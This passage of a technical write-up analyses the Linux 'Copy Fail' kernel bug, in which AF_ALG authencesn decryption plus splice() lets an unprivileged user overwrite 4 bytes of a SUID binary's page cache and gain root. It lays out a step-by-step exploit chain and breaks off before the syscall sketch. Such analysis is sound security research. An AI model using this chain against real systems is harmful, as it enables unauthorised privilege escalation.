That is the key idea: _aead_recvmsg() hands the next AEAD layer a normal-looking struct aead_request, but internally the request carries a chained scatterlist layout. The valid decrypt output is supposed to stop at AAD || plaintext, while the authentication tag remains reachable after that boundary as preserved input material.
This layout is not automatically a bug. It becomes dangerous only if a later AEAD implementation performs a destination-side write at the decrypt output boundary. In that case, scatterwalk may follow the chain into the preserved tag entry. If that entry is backed by a pipe/page-cache page, the write can become a page-cache overwrite primitive.
That is why the next layer matters. The selected AEAD implementation, authencesn(), decides whether this chained request layout stays harmless or turns into a boundary-crossing scratch write.
3.4 Authencesn Decrypt Path
Now we know the AEAD request has two views:
- semantic output view: output stops after AAD || plaintext
- scatterlist stream view: RX head is followed by the preserved TX tag tail
At this point, the layout itself is not the bug. The critical question is whether the selected AEAD implementation performs a destination-side write at the boundary where the valid decrypt output ends.
From the attacker's perspective, that means we want an out-of-bounds (OOB) write on a logical buffer.
For Copy Fail, userspace selected:
.salg_type = "aead",
.salg_name = "authencesn(hmac(sha256),cbc(aes))",
So the next step is to follow the prepared decrypt request into the selected authencesn implementation.
3.4.1 AEAD Decrypt Callback Dispatch
After _aead_recvmsg() prepares the AEAD request, it submits the operation according to the direction recorded earlier through sendmsg():
ctx->enc ? crypto_aead_encrypt(&areq->cra_u.aead_req) :
crypto_aead_decrypt(&areq->cra_u.aead_req);
For Copy Fail, the relevant branch is decryption through crypto_aead_decrypt():
/**
* crypto_aead_decrypt() - decrypt ciphertext
* @req: reference to the aead_request handle that holds all information
* needed to perform the cipher operation
*
* Decrypt ciphertext data using the aead_request handle. That data structure
* and how it is filled with data is discussed with the aead_request_*
* functions.
*
* ...
*/
int crypto_aead_decrypt(struct aead_request *req);
crypto_aead_decrypt() is still generic crypto API glue. It resolves the concrete AEAD transform from the request, finds the registered algorithm callbacks, and dispatches into the selected decrypt implementation:
int crypto_aead_decrypt(struct aead_request *req)
{
/*
* Resolve the concrete AEAD transform from the request.
*
* In this case, the transform was selected earlier through:
* salg_name = "authencesn(hmac(sha256),cbc(aes))"
*/
struct crypto_aead *aead = crypto_aead_reqtfm(req);
/*
* Resolve the algorithm implementation behind that transform.
*
* This gives access to the registered callbacks:
* alg->encrypt
* alg->decrypt
*/
struct aead_alg *alg = crypto_aead_alg(aead);
...
/*
* Dispatch into the concrete AEAD decrypt implementation.
*
* For authencesn(hmac(sha256),cbc(aes)), this becomes:
* crypto_authenc_esn_decrypt(req)
*/
else
ret = alg->decrypt(req); // [!] transition
return ret;
}
For the selected transform:
.salg_name = "authencesn(hmac(sha256),cbc(aes))"
the crypto core instantiates the authencesn AEAD template. During setup, crypto_authenc_esn_create() wires the callbacks:
inst->alg.encrypt = crypto_authenc_esn_encrypt;
inst->alg.decrypt = crypto_authenc_esn_decrypt;
So the generic dispatch collapses into:
crypto_aead_decrypt(req)
|
v
alg->decrypt(req)
|
v
crypto_authenc_esn_decrypt(req)
The full path from the operation socket is:
recvmsg(opfd, ...)
|
v
_aead_recvmsg()
|
| prepared struct aead_request
| req->src
| req->dst
| req->cryptlen
| req->assoclen
| req->iv
v
crypto_aead_decrypt(req)
|
v
alg->decrypt(req)
|
v
crypto_authenc_esn_decrypt(req)
No overwrite has happened yet. This section only proves the dispatch path:
AF_ALG recvmsg()
|
v
generic AEAD request submission
|
v
authencesn decrypt callback
Now that the AEAD request has been dissected in 3.3.4.4, the target is precise: inspect what crypto_authenc_esn_decrypt(req) does with req->src, req->dst, req->assoclen, and req->cryptlen.
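The dispatch pattern in this section, a generic entry point calling through a per-algorithm callback table, can be modeled in a few lines of userspace C. Everything below is a hypothetical sketch: `struct req_model`, `struct alg_model`, and the `*_model` functions are invented names, and the stand-in decrypt callback simply returns -EBADMSG to mimic an authentication failure.

```c
#include <assert.h>
#include <errno.h>
#include <stddef.h>

/* Hypothetical request object; records which callback handled it. */
struct req_model {
    int handled_by; /* 0 = nobody, 1 = encrypt, 2 = decrypt */
};

/* Hypothetical callback table, in the spirit of struct aead_alg. */
struct alg_model {
    int (*encrypt)(struct req_model *req);
    int (*decrypt)(struct req_model *req);
};

int esn_encrypt_model(struct req_model *req)
{
    req->handled_by = 1;
    return 0;
}

int esn_decrypt_model(struct req_model *req)
{
    req->handled_by = 2;
    return -EBADMSG; /* pretend the tag did not verify */
}

/* Callbacks are wired once, when the algorithm instance is created. */
const struct alg_model authencesn_model = {
    esn_encrypt_model,
    esn_decrypt_model,
};

/* Generic glue: knows nothing about the algorithm, only the table. */
int aead_decrypt_model(const struct alg_model *alg, struct req_model *req)
{
    assert(alg != NULL && alg->decrypt != NULL);
    return alg->decrypt(req);
}
```

The generic layer cannot tell what the callback did to the request before returning its error code. That is why a failing decrypt says nothing about whether a side effect already took place.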
3.4.2 The Destination-Side Scratch Writes
Inside crypto_authenc_esn_decrypt(), the decrypt path reads from and writes into the request scatterlists through scatterwalk_map_and_copy() (for walker mechanism see 3.3.3.4).
The relevant pattern in crypto_authenc_esn_decrypt(), which calls the scatterlist walker repeatedly, is:
static int crypto_authenc_esn_decrypt(struct aead_request *req)
{
unsigned int authsize = crypto_aead_authsize(authenc_esn);
unsigned int assoclen = req->assoclen;
unsigned int cryptlen = req->cryptlen;
struct scatterlist *dst = req->dst; // [!] dst is a chained scatterlist
u32 tmp[2];
/*
* req->cryptlen originally includes:
*
* ciphertext || tag
*
* After this subtraction, cryptlen means:
*
* ciphertext length only
*/
cryptlen -= authsize;
...
/*
* Read the authentication tag from:
*
* req->src at logical offset assoclen + cryptlen
*
* Direction flag out = 0 means:
* scatterlist -> local buffer
*/
scatterwalk_map_and_copy(
ihash,
req->src,
assoclen + cryptlen,
authsize,
0
);
/*
* Read the first 8 bytes of dst into tmp.
*/
scatterwalk_map_and_copy(
tmp,
dst,
0,
8,
0 // read flag: dst -> tmp
);
/*
* Scratch write #1:
* write tmp[0] into dst at logical offset 4.
*/
scatterwalk_map_and_copy(
tmp,
dst,
4,
4,
1 // write flag: tmp -> dst @ 4
);
/*
* Scratch write #2:
* write tmp[1] into dst at logical offset:
*
* assoclen + cryptlen
*/
scatterwalk_map_and_copy(
tmp + 1,
dst,
assoclen + cryptlen,
4,
1 // write flag: tmp+1 -> dst @ assoclen+cryptlen
);
...
}
The last argument to scatterwalk_map_and_copy() is the direction flag:
- out = 0 → read from scatterlist into local buffer
- out = 1 → write from local buffer into scatterlist
So these two calls are destination-side writes:
scatterwalk_map_and_copy(tmp, dst, 4, 4, 1);
scatterwalk_map_and_copy(tmp + 1, dst, assoclen + cryptlen, 4, 1); // [!] bug
The value flow is already visible here:
first 8 bytes of dst
dst[0:8]
│
▼
tmp[0] = AAD[0:4]
tmp[1] = AAD[4:8]
│
▼
tmp + 1 becomes the source of scratch write #2
Because dst starts at the RX head, and the RX head begins with AAD, this becomes:
tmp[0] = AAD[0:4]
tmp[1] = AAD[4:8]
So AAD[4:8] is not magic. It is first read into tmp[1], then later written back through the tmp + 1 scatterwalk write.
Before treating that second write as dangerous, we need to understand why authencesn performs this shuffle at all.
3.4.3 Authencesn ESN Shuffle
authencesn exists for IPsec Extended Sequence Number handling. In this mode, the associated data begins with sequence-number material split into two 32-bit halves:
AAD prefix
┌────────────┬────────────┐
│ seqno_hi │ seqno_lo │
│ 4 bytes │ 4 bytes │
└────────────┴────────────┘
During decrypt, authencesn() temporarily rearranges this material before authentication. The three scatterwalk_map_and_copy() calls from the previous section implement that shuffle:
/* Move high-order bits of sequence number to the end. */
scatterwalk_map_and_copy(tmp, dst, 0, 8, 0); // read
scatterwalk_map_and_copy(tmp, dst, 4, 4, 1); // scratch write #1
scatterwalk_map_and_copy(tmp + 1, dst, assoclen + cryptlen, 4, 1); // scratch write #2 [!]
Read as operations:
- read 8 bytes from logical offset 0 in dst into tmp
- write 4 bytes back into dst at logical offset 4
- write 4 bytes into dst at logical offset assoclen + cryptlen
Visually the read/write operations are:
ESN scratch-write layout
════════════════════════════════════════════════════════════
Step 1: read first 8 bytes from dst into tmp
dst starts at RX head
┌────────────┬────────────┬────────────────────┐
│ AAD[0:4] │ AAD[4:8] │ ciphertext / data │
└────────────┴────────────┴────────────────────┘
│ │
▼ ▼
┌────────────┬────────────┐
│ tmp[0] │ tmp[1] │
│ AAD[0:4] │ AAD[4:8] │
└────────────┴────────────┘
│
│ as the source of write
▼
Scratch write #1
════════════════
scatterwalk_map_and_copy(tmp, dst, 4, 4, 1)
dst
┌────────────┬────────────┬────────────────────┐
│ AAD[0:4] │ write here │ ciphertext / data │
└────────────┴────────────┴────────────────────┘
▲
│
logical offset 4
local AAD-area write tmp[0] == AAD[0:4]
Scratch write #2
════════════════
scatterwalk_map_and_copy(tmp + 1, dst, assoclen + cryptlen, 4, 1)
dst logical stream
┌────────────┬────────────────────┐ ┌────────────────────┐
│ AAD │ plaintext/output │ │ chained tag entry │
└────────────┴────────────────────┘ └────────────────────┘
▲
│
offset assoclen + cryptlen
write tmp[1] == AAD[4:8]
└─────────────── sgl chained by sg_next() ────────────────┘
The first write is local, staying near the AAD/ESN area:
tmp[0] -> dst @ 4
The second write is the pivot:
tmp[1] -> dst @ assoclen + cryptlen
Here tmp[1] comes from AAD[4:8], but the destination is no longer a fixed ESN-local offset. It is a calculated AEAD boundary.
If dst were one flat private output buffer, this might still look like ordinary scratch space. But dst is a scatterlist chain, and _aead_recvmsg() may place a preserved TX tag entry after the valid RX output head.
So the value side is already clear:
AAD[4:8] -> tmp[1] -> scratch-write source
The next question is the destination side, the chained tag sg entry:
Where does logical offset assoclen + cryptlen inside dst actually land?
That boundary is what we dissect next.
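The value flow of the shuffle can be replayed on a flat userspace buffer. This is a hypothetical sketch (`esn_shuffle_model()` is an invented name) that replaces scatterwalk_map_and_copy() with memcpy(), so nothing crosses into another scatterlist entry here. It assumes cryptlen has already had the tag size subtracted and that assoclen is at least 8. It only shows which bytes move where.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/*
 * Flat-buffer model of the three ESN shuffle steps.
 * dst layout: AAD (assoclen bytes) || data (cryptlen bytes) || trailing bytes.
 */
void esn_shuffle_model(unsigned char *dst, size_t dst_len,
                       size_t assoclen, size_t cryptlen)
{
    uint32_t tmp[2];

    assert(assoclen >= 8);                      /* model precondition */
    assert(assoclen + cryptlen + 4 <= dst_len); /* stay inside the flat buffer */

    /* Read dst[0:8] into tmp: tmp[0] = AAD[0:4], tmp[1] = AAD[4:8]. */
    memcpy(tmp, dst, 8);

    /* Scratch write #1: tmp[0] -> dst @ 4. */
    memcpy(dst + 4, &tmp[0], 4);

    /* Scratch write #2: tmp[1] -> dst @ assoclen + cryptlen. */
    memcpy(dst + assoclen + cryptlen, &tmp[1], 4);
}
```

Feeding it an AAD of "HHHHLLLL" followed by 16 data bytes leaves "HHHH" at offset 4 and "LLLL" at offset 24, the first byte past AAD || data. In the flat model that is harmless trailing space; the open question is what sits there in the chained layout.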
3.4.4 Decrypt-boundary Write Offset
That final scratch write above is the critical one:
scatterwalk_map_and_copy(
tmp + 1, // source: AAD[4:8] staged in tmp[1]
dst, // target scatterlist
assoclen + cryptlen, // logical destination offset
4, // 4-byte write
1 // write flag: tmp+1 -> scatterlist
);
The important detail is that crypto_authenc_esn_decrypt() first removes the authentication tag from cryptlen:
cryptlen -= authsize;
So by the time the scratch write runs, cryptlen no longer means ciphertext || tag. It means ciphertext length only.
Therefore, the start-offset argument of that second scratch write:
assoclen + cryptlen
points to the boundary immediately after:
AAD || ciphertext
For AEAD decryption, ciphertext and plaintext have the same length, so this is also the boundary after the legitimate output:
assoclen + ciphertext_len == assoclen + plaintext_len
The boundary looks like this:
AEAD decrypt boundary
══════════════════════════════════════════════════════════════
decrypt input:
┌────────────┬────────────────────┬────────────┐
│ AAD │ ciphertext │ tag │
└────────────┴────────────────────┴────────────┘
0 assoclen assoclen+cryptlen
│
│
preserved tag
│
│
│
valid decrypt output: ▼
┌────────────┬────────────────────┐ ┌────────────┐
│ AAD │ plaintext │ │ chained tag│
└────────────┴────────────────────┘ └────────────┘
0 assoclen assoclen+plaintext_len
▲
│
valid output ends here
│
▼
authencesn 4-byte scratch write starts here
└────────── sgl chained by sg_next() ───────────┘
As established in 3.3.4.4, the final decrypt request can be built as a scatterlist chain: a valid RX output head followed by a preserved TX tag tail.
Those entries are not physically contiguous, and they are not adjacent virtual-memory regions in the normal userspace sense. But to scatterwalk, they form one logical byte stream. Once the walker reaches the end of one scatterlist entry, it can continue through sg_next() into the next entry.
That is why the scratch write has an overflow-style shape:
- value: AAD[4:8]
- write source: tmp + 1
- write destination: dst @ assoclen + cryptlen
- semantic meaning: exact end of valid decrypt output
- scatterlist meaning: continue into the next chained entry if one exists
More precisely:
authencesn writes AAD[4:8] as 4 bytes at the end of the valid decrypt output region, and scatterwalk can carry that write into the next chained scatterlist entry.
At this point, we have proven the algorithm-side write. We have not yet proven that the next chained entry is page-cache-backed. That bridge comes from the splice path: a file-backed page can enter the AEAD TX side through the pipe-to-socket handoff (see 3.2.4).
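The two layers compute the same boundary from different inputs, which a short arithmetic sketch makes explicit. The helper names below are hypothetical, and the sketch assumes the RX head covers exactly outlen bytes.

```c
#include <assert.h>
#include <stddef.h>

/*
 * Offset of scratch write #2 as seen inside the authencesn decrypt path:
 * req->cryptlen still includes the tag, so the tag size is removed first.
 */
size_t scratch_write_offset_model(size_t assoclen, size_t req_cryptlen,
                                  size_t authsize)
{
    assert(req_cryptlen >= authsize);
    return assoclen + (req_cryptlen - authsize);
}

/*
 * Length of the RX head as seen by the AF_ALG layer:
 * outlen = processed - as, where processed = AAD + ciphertext + tag.
 */
size_t rx_head_len_model(size_t processed, size_t as)
{
    assert(processed >= as);
    return processed - as;
}
```

With illustrative numbers (8 bytes of AAD, 16 bytes of ciphertext, a 16-byte tag), req->cryptlen is 32 and processed is 40. Both helpers return 24: the write offset equals the RX head length, so the first written byte is byte 0 of whatever entry is chained next.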
Chapter 4 puts those pieces together into the full exploit chain (details start from 4.3).
4 Vulnerability Anatomy
4.1 Vulnerability Overview
At a high level, this bug lets an unprivileged user modify a few bytes of a root-owned executable file, even though that file was only supposed to be read, not written.
The trick is that the write does not go through the normal filesystem write path at all. Instead, the attacker makes the kernel treat file-backed pages as part of a crypto request, and then relies on a buggy decrypt path to write 4 controlled bytes past the valid output boundary, into the in-memory page-cache page that execve() later reuses.
So the bug is the opposite of copying:
- the target file page is first borrowed into a pipe by the zero-copy splice() path,
- that page is then reused inside an AF_ALG AEAD decrypt request,
- and the selected buggy authencesn() decrypt implementation writes 4 bytes into the wrong place.
If the chosen target is a SUID binary such as /usr/bin/su, corrupting its cached executable bytes is enough to turn a decrypt request into local privilege escalation. The request itself may fail authentication, but that does not matter: the write has already happened.
4.2 Copy Fail Exploit Chain
After a deep dive through the Linux kernel, the exploit chain becomes easier to read. Each step below links back to the section where that mechanism was introduced.
- Pick a file-backed executable target whose bytes are served through the page cache. For privilege escalation, the target can be a root-owned SUID binary such as /usr/bin/su.
- Open an AF_ALG AEAD socket path for authencesn(hmac(sha256),cbc(aes)), so a later recvmsg() reaches the selected authencesn() decrypt path.
- Use sendmsg() to queue attacker-controlled AAD. Bytes 4..7 of that AAD become seqno_lo, the 4-byte value later written by crypto_authenc_esn_decrypt() during the "OOB" scatterlist walk.
- Use splice(file -> pipe) so the pipe holds a pipe_buffer referencing the target file's cached page, rather than a private copied buffer.
- Use the pipe -> socket splice path so that same pipe-backed page is forwarded through splice_to_socket(). Internally, the pipe buffer becomes a bio_vec, then a page-backed msg_iter marked with MSG_SPLICE_PAGES.
- On the accepted AF_ALG operation socket, af_alg_sendmsg() handles the MSG_SPLICE_PAGES payload and converts the page-backed iterator into the AEAD TX scatterlist. At this point, the target file's page-cache page has entered the crypto request path.
- Let _aead_recvmsg() build the decrypt request scatterlist: the valid RX output head is backed by the caller's receive buffer, while the preserved TX tag tail can still point at the spliced file-backed page.
- Trigger decrypt with recvmsg(). On the authencesn() decrypt path, the kernel performs the destination-side scratch write at assoclen + cryptlen.
- Because scatterwalk follows the chained scatterlist mechanically, that 4-byte write crosses the valid decrypt output boundary and lands in the next chained entry, which is backed by the target file's page-cache page.
- The decrypt operation fails authentication and returns an error, but the 4-byte overwrite remains in page cache. A later execve() of the target binary consumes the corrupted executable bytes.
Chained from the kernel perspective:
Exploit chain
════════════════════════════════════════════════════════════
1. choose target
root-owned SUID executable
e.g. /usr/bin/su
│
▼
2. file page enters pipe
splice(file -> pipe)
pipe_buffer references cached file page
│
▼
3. pipe page enters socket send path
splice(pipe -> socket)
pipe_buffer -> bio_vec -> msg_iter
MSG_SPLICE_PAGES
│
▼
4. page enters AF_ALG TX scatterlist
af_alg_sendmsg()
extract_iter_to_sg()
│
▼
5. attacker-controlled AAD is queued
AAD[4:8] = seqno_lo
4-byte value to be written later
│
▼
6. decrypt request is built
_aead_recvmsg()
RX output head + chained TX tag tail
│
▼
7. authencesn decrypt runs
crypto_authenc_esn_decrypt()
│
▼
8. destination-side scratch write
scatterwalk_map_and_copy(...,
dst,
assoclen + cryptlen,
4,
out = 1)
│
▼
9. scatterwalk follows sg_next()
valid RX output -> chained TX tag entry
│
▼
10. page-cache overwrite
4 attacker-controlled bytes land in cached file page
│
▼
11. later execve()
kernel executes corrupted cached executable bytes
In compact form:
SUID file page → splice(file -> pipe) → pipe_buffer refs cached page → splice(pipe -> socket) → msg_iter with MSG_SPLICE_PAGES → AF_ALG TX scatterlist → TX tag tail chained after RX output → authencesn scratch write @ assoclen+cryptlen → scatterwalk follows sg_next() → 4-byte page-cache overwrite → later execve() runs corrupted cached executable bytes
4.3 Vulnerable Execution Path
This section closes the last gap left at the end of Chapter 3. We already proved the algorithm-side write in authencesn(); now we follow one target file page until it becomes the chained TX-side scatterlist entry that sits behind the decrypt boundary.
4.3.1 File-to-pipe Page Installation
The first half of the primitive comes from the regular-file splice() path:
splice() → do_splice() → splice_file_to_pipe() → do_splice_read() → filemap_splice_read() → splice_folio_into_pipe()
The important effect is that splice_folio_into_pipe() creates a struct pipe_buffer that directly references the file-backed page-cache page:
*buf = (struct pipe_buffer) {
.ops = &page_cache_pipe_buf_ops,
.page = page, // cached file page
.offset = offset, // target file offset on page
.len = part,
};
So after splice(file -> pipe), the pipe does not hold an anonymous copy of the file data. It holds a pipe-buffer entry pointing at the cached file page itself.
target file offset
|
v
cached file page in page cache (folio/page)
|
v
pipe buffer references that page
That gives the first half of the primitive:
target file offset -> cached file page -> pipe buffer reference
At this point, no corruption has happened yet. The only state we have is a file-backed page-cache page represented by a pipe buffer. The next question is how that pipe buffer reaches the AF_ALG request path.
4.3.2 Pipe Page Into TX Scatterlist
The pipe now references a cached file page. The exploit needs that same page reference to become crypto input, so the next step is splice(pipe -> AF_ALG socket).
That handoff happens when pipe data is spliced into the accepted AF_ALG operation socket. In splice_to_socket(), the kernel consumes pipe buffers and describes their backing pages as bio_vec entries, as shown in fs/splice.c:869-891:
struct pipe_buffer *buf = &pipe->bufs[tail & mask]; // pipe buffer
...
bvec_set_page(
&bvec[bc++],
buf->page, // page referenced by pipe_buffer
seg, // length
buf->offset // offset inside that page
);
...
msg.msg_flags = MSG_SPLICE_PAGES; // [!]
...
ret = sock_sendmsg(sock, &msg);
The important part is:
pipe_buffer page
|
v
bio_vec entry
|
v
socket sendmsg with MSG_SPLICE_PAGES
So the page is not copied into a normal userspace buffer. It is carried forward as a page-backed iterator into the socket send path.
For the accepted AF_ALG AEAD socket, sock_sendmsg() dispatches into aead_sendmsg(), which immediately forwards into af_alg_sendmsg():
sock_sendmsg()
|
v
aead_sendmsg()
|
v
af_alg_sendmsg()
Inside af_alg_sendmsg(), the exploit-relevant path is selected by MSG_SPLICE_PAGES, as shown in af_alg.c:1040-1061:
static int af_alg_sendmsg(struct socket *sock,
struct msghdr *msg, // sendmsg() message from user space
size_t size,
unsigned int ivsize)
{
...
// msg.msg_flags = MSG_SPLICE_PAGES
if (msg->msg_flags & MSG_SPLICE_PAGES) {
struct sg_table sgtable = {
.sgl = sg, // TX scatterlist
.nents = sgl->cur, // used entries
.orig_nents = sgl->cur,
};
// [!] conversion
plen = extract_iter_to_sg(
&msg->msg_iter, // spliced/page-backed iterator
len,
&sgtable, // append into sg table
MAX_SGL_ENTS - sgl->cur,
0
);
...
for (; sgl->cur < sgtable.nents; sgl->cur++)
get_page(sg_page(&sg[sgl->cur])); // keep page alive
...
This is the conversion point:
pipe-backed iterator
|
v
extract_iter_to_sg()
|
v
AF_ALG TX scatterlist entry
So the full bridge is:
cached file page
|
v
pipe buffer references that page
|
v
splice_to_socket()
|
v
MSG_SPLICE_PAGES sendmsg
|
v
af_alg_sendmsg()
|
v
extract_iter_to_sg()
|
v
TX scatterlist entry
At this point, the target file page is no longer only sitting behind a pipe buffer. It has become part of the AEAD request's TX scatterlist. It is still only input, though; the write becomes possible only after _aead_recvmsg() builds the in-place decrypt layout.
file-backed page enters AEAD TX path
═══════════════════════════════════════════════
┌────────────────────────────┐
│ target file page cache │
│ /usr/bin/su @ offset X │
└──────────────┬─────────────┘
│ splice(file -> pipe)
▼
┌────────────────────────────┐
│ pipe buffer │
│ references cached page │
└──────────────┬─────────────┘
│ splice(pipe -> AF_ALG socket)
│ MSG_SPLICE_PAGES
▼
┌────────────────────────────┐
│ AF_ALG TX scatterlist │
│ sg entry references page │
└────────────────────────────┘
4.3.3 Chained Decrypt Request Layout
Now the AF_ALG operation socket has both ingredients:
- attacker-controlled AAD submitted through the normal sendmsg() path;
- file-backed TX scatterlist entries imported through the MSG_SPLICE_PAGES path.
_aead_recvmsg() is where those two ingredients are combined. It converts the queued TX state and the caller's RX buffer into the final AEAD decrypt request.
On the decrypt path, the construction happens in three steps:
- copy output-sized prefix: from TX (AAD || ciphertext || tag) to RX (AAD || ciphertext)
- preserve the left-over TX tag tail: tag
- chain preserved tag after RX head: RX head → TX tag tail
In code, the important operations are:
- crypto_aead_copy_sgl() copies the decrypt output-sized prefix into RX: AAD || ciphertext.
- af_alg_pull_tsgl() preserves the TX-side tag tail instead of copying it into the RX output region.
- sg_chain() links that preserved TX tail after the RX head.
- aead_request_set_crypt() and aead_request_set_ad() wire the final struct aead_request.
The final request shape is:
AEAD decrypt request
════════════════════════════════════════════════════
req->src ──▶ RX head ───────────────▶ TX tag tail
[ AAD || ciphertext ] [tag]
req->dst ──▶ RX head
[ AAD || plaintext ]
^
valid output ends here
The exploit-relevant detail is the TX tag tail:
- preserved input tag region
- chained after the RX output head
- can still be backed by the spliced file page
This is the exact point where the file-backed page imported through the pipe becomes the next scatterlist entry after the valid decrypt output region. The page is now positioned behind the boundary; the remaining missing piece is a write that starts at that boundary.
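The three construction steps can be restated as plain length bookkeeping. The sketch below is a toy model, not kernel code: `plan_decrypt_layout` and its dictionary keys are hypothetical names, the lengths passed in are illustrative, and only the byte counts of each segment are tracked.

```python
def plan_decrypt_layout(used: int, assoclen: int, authsize: int) -> dict:
    """Model the decrypt layout described above, tracking lengths only.

    used     : total queued TX bytes (AAD || ciphertext || tag)
    assoclen : AAD length
    authsize : tag length
    """
    if used < assoclen + authsize:
        raise ValueError("queued input is too short for AAD plus tag")

    outlen = used - authsize        # step 1: AAD || ciphertext is copied TX -> RX
    cryptlen = outlen - assoclen    # ciphertext bytes only

    rx_head = ("RX head", outlen)
    tx_tag_tail = ("TX tag tail", authsize)   # step 2: preserved, not copied

    return {
        "src": [rx_head, tx_tag_tail],        # step 3: tag tail chained after RX head
        "dst_valid": [rx_head],               # the only region decrypt should write
        "chained_after_dst": tx_tag_tail,     # what a walk past dst_valid reaches
        "valid_output_end": assoclen + cryptlen,
    }


# Illustrative lengths: 8-byte AAD, 16-byte ciphertext, 16-byte tag.
layout = plan_decrypt_layout(used=40, assoclen=8, authsize=16)
print(layout["src"], layout["valid_output_end"])
```

The point of the model is the last two keys: the valid output ends exactly where the preserved tag tail begins.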
4.3.4 Authencesn Scratch Write
The previous step leaves us with a decrypt request whose req->dst starts at the RX head, while the preserved TX tag tail is chained immediately after that valid output region. Nothing has been overwritten yet; _aead_recvmsg() has only constructed the shape.
The overwrite happens only when that prepared request is submitted to the selected AEAD implementation. In this path, crypto_aead_decrypt() dispatches the request into crypto_authenc_esn_decrypt(), the decrypt callback for authencesn(hmac(sha256),cbc(aes)).
The exploit-relevant lines are:
cryptlen -= authsize;
...
/*
* Read the first 8 bytes from dst into tmp.
*
* In this request layout, dst starts at the RX head,
* whose first bytes are the AAD.
*/
scatterwalk_map_and_copy(
tmp,
dst,
0,
8,
0 // read flag: scatterlist -> tmp
);
/*
* Write tmp[0] (the first 4 bytes, AAD[0:4]) back at offset 4, inside the AAD area.
*/
scatterwalk_map_and_copy(
tmp,
dst,
4,
4,
1 // write flag: tmp -> scatterlist
);
/*
* Write tmp[1] (the second 4 bytes, AAD[4:8]) at the decrypt boundary.
*
* This is the Copy Fail write.
*/
scatterwalk_map_and_copy(
tmp + 1,
dst,
assoclen + cryptlen,
4,
1 // write flag: tmp -> scatterlist
);
The first scatterwalk_map_and_copy() reads 8 bytes from the beginning of dst into tmp. Since req->dst starts at the RX head, and the RX head begins with the AAD, this captures:
tmp
┌────────────┬────────────┐
│ tmp[0] │ tmp[1] │
│ AAD[0:4] │ AAD[4:8] │
└────────────┴────────────┘
So the attacker-controlled bytes staged in AAD[4:8] become tmp + 1.
Then authencesn() uses that tmp + 1 pointer as the source of the second scratch write:
scatterwalk_map_and_copy(tmp + 1, dst, assoclen + cryptlen, 4, 1);
That gives the value flow:
AAD[4:8] -> read into tmp[1] (tmp+1) -> 4-byte scratch write source
The offset side is separate. cryptlen is first reduced by the tag size:
cryptlen -= authsize;
So at the time of the write:
cryptlen = ciphertext length
and the destination offset becomes:
assoclen + cryptlen
= AAD length + ciphertext length
= end of valid decrypt output
Therefore the write operation is:
value = AAD[4:8]
target = dst @ assoclen + cryptlen
size = 4 bytes
Visually:
valid decrypt output
┌────────────┬────────────────────┐
│ AAD │ plaintext │
└────────────┴────────────────────┘
^
│
AAD[4:8] is written here as 4 bytes
Because scatterwalk_map_and_copy() walks the destination scatterlist mechanically, the write does not stop just because the AEAD output boundary ends there. If the next scatterlist entry is chained after RX, sg_next() carries the write forward.
In this exploit path, that next entry is the preserved TX tag tail backed by the spliced file page. That completes the bridge from attacker-controlled AAD bytes to a page-cache-backed destination.
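To make the boundary crossing concrete, here is a userspace-only toy model of the three calls. It assumes a scatterlist can be approximated as a Python list of `bytearray` entries; `sg_copy` is a hypothetical stand-in for scatterwalk_map_and_copy(), and the byte values are illustrative. Nothing here touches the kernel or a real file.

```python
def sg_copy(buf, sgl, start, nbytes, out):
    """Toy stand-in for scatterwalk_map_and_copy().

    Walks the chained entries in `sgl` by logical offset. Moving on to the
    next list element models sg_next(). out=True copies buf -> scatterlist,
    out=False copies scatterlist -> buf.
    """
    done, pos = 0, start
    for entry in sgl:
        if pos >= len(entry):          # offset lies beyond this entry: skip it
            pos -= len(entry)
            continue
        n = min(nbytes - done, len(entry) - pos)
        if out:
            entry[pos:pos + n] = buf[done:done + n]
        else:
            buf[done:done + n] = entry[pos:pos + n]
        done += n
        pos = 0                        # continue at the start of the next entry
        if done == nbytes:
            return
    raise ValueError("walk ran past the end of the chain")


assoclen, cryptlen = 8, 16                       # cryptlen after the tag is subtracted
file_page = bytearray(b"ORIG" + b"t" * 12)       # models the preserved TX tag tail
rx_head = bytearray(b"AAAAPWN!" + b"c" * cryptlen)
dst = [rx_head, file_page]                       # RX head chained to the tag tail

tmp = bytearray(8)
sg_copy(tmp, dst, 0, 8, out=False)                        # read AAD[0:8] into tmp
sg_copy(tmp[0:4], dst, 4, 4, out=True)                    # tmp[0] back at offset 4
sg_copy(tmp[4:8], dst, assoclen + cryptlen, 4, out=True)  # tmp + 1 at the boundary

print(bytes(file_page[:4]))
```

In this model the last call starts exactly at the end of `rx_head`, so every one of its 4 bytes lands in the chained entry rather than in the RX head.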
4.3.5 Page-cache Overwrite Primitive
Now the two halves meet. The previous step showed the write gadget:
scatterwalk_map_and_copy(
tmp + 1,
dst,
assoclen + cryptlen, // scatterlist walk oob
4, // bytes to write
1 // write flag
);
From 4.3.4, the value comes from the AAD:
AAD[4:8] -> tmp + 1 -> 4-byte scratch write source
By itself, that is only a 4-byte destination-side scatterlist write. It becomes the Copy Fail primitive because of the request layout built earlier: dst starts at the RX output head, but the scatterlist does not stop there. After the valid decrypt output region, it continues into the preserved TX tag entry.
That preserved TX tag entry came from the spliced pipe path. Earlier, af_alg_sendmsg() imported the MSG_SPLICE_PAGES payload into the AEAD TX scatterlist, so the chained tag entry can still reference the target file's cached page.
Now the primitive is fully assembled:
- WHAT to write:
  - AAD[4:8] / seqno_lo
- HOW the write happens:
  - authencesn scratch write: scatterwalk_map_and_copy(..., dst, assoclen + cryptlen, 4, out = 1)
- WHERE it lands:
  - chained TX tag entry
  - spliced file-backed page
So the write path is:
attacker input
──────────────
AAD[4:8] / seqno_lo
│
▼
authencesn scratch write
────────────────────────
scatterwalk_map_and_copy(tmp + 1,
dst,
assoclen + cryptlen,
4,
out = 1)
│
▼
scatterlist crossing
────────────────────
dst output boundary
│
▼
sg_next()
│
▼
preserved TX tag entry
│
▼
file-backed page-cache page
This is the core Copy Fail primitive: a 4-byte attacker-controlled value is written through the AEAD destination scatterlist into a page-cache-backed entry.
The important point is that userspace never performs a normal write() to the target file. The file page is first imported through splice(), then carried into the AF_ALG TX scatterlist, and finally overwritten by the kernel-side authencesn scratch write.
To turn this into a write-what-where primitive, userspace has to arrange those kernel states through ordinary syscalls. The next section shows that syscall shape.
4.3.6 Syscall-level Primitive
At the syscall level, the primitive is not a normal file write. Userspace only arranges two things:
- the 4-byte value to write, staged through AAD[4:8]
- the file-backed target page, staged through splice()
Then it triggers the kernel-side decrypt path.
A sketch for the exploit workflow:
/*
